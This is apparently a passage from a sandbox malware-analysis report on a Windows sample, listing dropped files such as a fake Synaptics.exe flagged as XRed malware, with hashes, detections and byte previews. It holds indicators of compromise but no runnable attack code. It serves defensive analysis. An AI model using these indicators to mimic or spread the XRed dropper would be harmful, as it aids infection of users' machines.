                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6306
                                                                                                                    Entropy (8bit):3.718036114267642
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:RSIU6o7wVetb0xjV687fYiSjR8sU5aMQUu89bPdfsfs9Fm:R6l7wVeJ0xjV6iYiSjOpDu89bFfsfs3m
                                                                                                                    MD5:DBE285BB8486002FB095B092935E9C63
                                                                                                                    SHA1:8CA2B75A705E06F7F9A9F1472FBA2BD00E8303CF
                                                                                                                    SHA-256:1204D2225BADCF0C543E0AD8710C4B367BD1E547DEE2F3A6E3789481A70D1FD6
                                                                                                                    SHA-512:51BEE6240A1F5B543495111EBDAEDC49C089C2F2BC856ACF7680A50564D36C6E01694A175E9891BB5BC83C417648513B28D27747ABDD36B468615792E7759722
                                                                                                                    Malicious:false
                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.6.4.<./.P.i.

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C7D.tmp.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4572
                                                                                                                    Entropy (8bit):4.444370703025569
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zs4EJg77aI9OJWpW8VYOcYm8M4JFTF/+q84iJZydd:uIjfhI7c47Vb5JX0JZydd
                                                                                                                    MD5:0C613B480ADF175DA3667E8249825FC5
                                                                                                                    SHA1:F485A76D5952F5EAADF766191D0D9E67908C7E2D
                                                                                                                    SHA-256:81B9338AB3DCFBF6EE836C36D7869962A428C1182F374528D8E70A9377C0D5AE
                                                                                                                    SHA-512:03EBEB6BB27A324F566D3FF67878B79D9930D50361AE3D19F02C5CE22E1590F9062586F09D52BC5042B4D946DCAA5E845BE62C54464BFA7D05CA31BB3876CB1E
                                                                                                                    Malicious:false
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653849" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC82.tmp.dmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:26:18 2024, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):5152138
                                                                                                                    Entropy (8bit):2.1478056671194277
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:QevpVQush69BahbX65xCjcwYySTgLbCzw68SFMzc6kAydxpNkFwBJ:Qmp943iQet4pA
                                                                                                                    MD5:722FAF8BD4ED19058D9C2ABB1C076305
                                                                                                                    SHA1:508A81F78EAB5DAE97966DBE308919BDDA84C5DA
                                                                                                                    SHA-256:8073E1C2D14061F5EFE5BEFB6E88C576D48D681D86B84C1C404FB47ABCFD93D8
                                                                                                                    SHA-512:5C11D5B87F8A71DCC979007D03DFF4684286549CE7AF0BD0EE69A92949BC21D410337C6C15A3CD2566A20187FE5C14BA2792157D570EDD6FE4F21A1AEC009EE0
                                                                                                                    Malicious:false
                                                                                                                    Preview:MDMP..a..... .......Jurg............4W..............H^......$....}......................`.......8...........T.................L..........~..........................................................................................eJ..............GenuineIntel............T.......(....urg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\Synaptics\RCXFBD9.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\LWQDFZ.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):771584
                                                                                                                    Entropy (8bit):6.632118854531729
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ITr:ansJ39LyjbJkQFMhmC+6GD98
                                                                                                                    MD5:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                    SHA1:E2F47601FCAD62183937567210B5062B0750FA70
                                                                                                                    SHA-256:5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
                                                                                                                    SHA-512:063E5F2432DE4D24E6BE92BD50B0E12E12DDB030615809994EE64551E8D03391C807FEE2D95EACF7669BA816981FA9ABF3A4A7B8574AE0634BEB670F015A031C
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXFBD9.tmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXFBD9.tmp, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                    C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\LWQDFZ.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1686528
                                                                                                                    Entropy (8bit):7.462560448742017
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:cnsHyjtk2MYC5GDchloJf5fj22pkXaxMa:cnsmtk2alhlyLZ
                                                                                                                    MD5:27BCC0D927E9F13250B1DFF9E122E9AF
                                                                                                                    SHA1:2F9F09F46FE7EE2A495247292B3F2BE0777C2873
                                                                                                                    SHA-256:71C45BE1D4E8D17AEE605F93EE991D9117572E1F79C8991BFA2F7B37B285B5F1
                                                                                                                    SHA-512:1BDF5D3BA61B8D99955B92B87377FCBEA08DB248AAE1089A9028A0613EB06C43E330BD781EDF66EC955B1042C811094207B8962E391B37FC516A4B93664C7653
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@.......................... ...................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                    C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\LWQDFZ.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):26
                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                    Malicious:true
                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                    C:\Users\user\AppData\Local\Temp\2Px1XcC.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.267357970275835
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                                    MD5:6E7261E9AEE4D28A152FB3F44E05C2F3
                                                                                                                    SHA1:3727AAD1BDD021915454503BD17B52CCDF9C43BC
                                                                                                                    SHA-256:F3713B4F6970FE0558D52C3CFC2CFFC3195654E38E50B33E91815AC1838570D3
                                                                                                                    SHA-512:95D5F5038E9F8397A53D393960E2C1A969949C3969E88CE72522D3D724EE50D177319C8D67ED39420393485550940A83B2EA187219FA6BD011717AB88FD8D00F
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CByQaAIfrXI9_xuL2GWUlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\2ewUnO3.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.255192591586912
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+02SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                                                    MD5:A69BA5669B58E193B0EDB540FCDC6EB7
                                                                                                                    SHA1:EB25FA28BBF0FB125FFF1D0913A378753C5DB2C5
                                                                                                                    SHA-256:C9AB443727D6BA425A97C65EC53C3FA7A6CB7A5A78C8305A9B9C74C27DDCE8E1
                                                                                                                    SHA-512:F9B70DDF27B0A5FF267655D9568BF6DDDBB7422E09117B44C9026AE8EFD6EAB7D409A80E08C23AADA96BCDBE894F00BA76D506A3FEC6C9431ECCCFDEAB2F9A5B
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kc1yP2pR_zzwK0i7wWXpYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\2pVhxI7.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.273017315600478
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0fU8SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t8+pAZewRDK4mW
                                                                                                                    MD5:BD26F2F6AD90F71D3579B269FA5E6E07
                                                                                                                    SHA1:8A3F0A435A11DFD0BAED604BC07E18D8FF546A36
                                                                                                                    SHA-256:AF63C8ECCEC0F0A63D9574F934E3B50362C420951F6E6FA4031AF94278508031
                                                                                                                    SHA-512:5CBEE5F9DBAC50BC4909A12BB11A779016D63FF0AEF2CD746267B8418CE19521B39F8E59D4D791DC6F446603B9A09B22361B540695F4F1E6813DA34777DC6FA8
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vRwH9vjAGkWPeKjK7IahaQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\4mP8wJX.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.255316766133396
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                    MD5:4E192197D779BD29594691146B58FC0C
                                                                                                                    SHA1:870446E7415397F38E749F2990C55B1E9DCB2356
                                                                                                                    SHA-256:8A750A40338610259C9967577D9EF2C1EC1B93B49EF49592183BF06D9EBEC38A
                                                                                                                    SHA-512:3188C4A7EED382E2BE3DEE64503D1595F7967A095D1EBDF8F30273C8265EF303D85B2B1BD16ABED36306D68C21424DE1C10BBCEACAAEFCCF029D8C824A193A27
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Oi4G1FQlsowV2AAhqTiwVw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\5jr7byY.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.260657619744371
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0fDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                    MD5:7E617261F57EA9070F9133660B820FAA
                                                                                                                    SHA1:03A9FA362688717D4CEA8D3C28DDB3C626FDCA49
                                                                                                                    SHA-256:44EAE7FF95E45D9877E3ECDCC678B68E42EB81DA4C2F8E4488BDC34F95477E89
                                                                                                                    SHA-512:2D55A5287DADA47B7E4B1FA119C6EB2A2E6C75923FEC4DF55985B409BC95D299C7FC6E61D2942C610D3775193B0465FD50CD8A77A910423687634ED63E111128
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YO1kKkrn4e-Dc1N6L3QlCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\5oTn2UU.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.260761270390487
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0hrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+q+pAZewRDK4mW
                                                                                                                    MD5:475A26D8E7F0954F2CDDA76D57089E33
                                                                                                                    SHA1:078FA8390AD6B89DD573037023017B93BFEF23AC
                                                                                                                    SHA-256:6E573E012A0F6B34D4DF37D75B17C83055B6B0E545DA2996A3F7685D109AC18C
                                                                                                                    SHA-512:685B4B02F77157F97A772EDED889DE25F9061AB58C42758BEB74B0A8D3C28B37D39F43C91FE8BB75BD22D8F8EA9E2FB084DDD4CC439771A3F6F3334FC0859CCC
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HTar018hTKU4NpMvCw7RKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\8KU5Rl9.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.259042962817581
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+++pAZewRDK4mW
                                                                                                                    MD5:332D685A09337771AB0BBBF4555EB8E4
                                                                                                                    SHA1:7857D2C677B35408612EDEE1D58F1DE2214AC410
                                                                                                                    SHA-256:FE0053F34A2B277521DB87786AF4F7AEB95178038E6841EE00FE24AA7A7A2DAA
                                                                                                                    SHA-512:E9F349F198E77CD94EDBB0CBE41BE6AD13804ADF3DFFD638500BF7616BB2C49323BD027630D0FB2F6F656247B27239391EE456BD5CF8E8FA4FCFEB8224AC4AC5
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SF6CbXfefswcK42tvJvFxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\9SPCWzf.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.268417303517373
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z+pAZewRDK4mW
                                                                                                                    MD5:0EA63AE4E34197209D504C9551A32AD0
                                                                                                                    SHA1:F3D579E7FBD03DB20EF43C378CECC4EF6C7585BF
                                                                                                                    SHA-256:6395EA50A78F8CC29C08E1391C94FD5940CEFD356D42844B5A30CF9BEE2ED20B
                                                                                                                    SHA-512:399C603CA9F3FFFAC83FF1E60C9005D44B5C8BD7BAC549894FEA8DFCF043FCBD884FBA88ADA5984B156DD03F9B817E0777E107458CF0DEB79A1CEFB26EEFDE3B
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8bWzn8miL7mYfHwVKMWAQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\9aatXb5.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.266838314462909
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0tSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                    MD5:6D853574CF1192CCFF0B14370BA2F5E3
                                                                                                                    SHA1:0ED150B46A9B7AB956194B10DD5A53B331398E04
                                                                                                                    SHA-256:4B2E98EC05CD63A9C1DEC330ADDA422D2E6B188CC1AB964021ADD27CFE2C23B8
                                                                                                                    SHA-512:E65A1AAC5E67EFA6CEF3346103CC1A3186B70C3296191D40649B60868F36800DE5203A387A03B1BDB1391AE0A315B583D2D5DEF45836CCE8D6FAE23116AA0A3B
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A1Zj_3JStgsRqs3JlqWXcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\BUeSbfo.ini

                                                                                                                    Download File
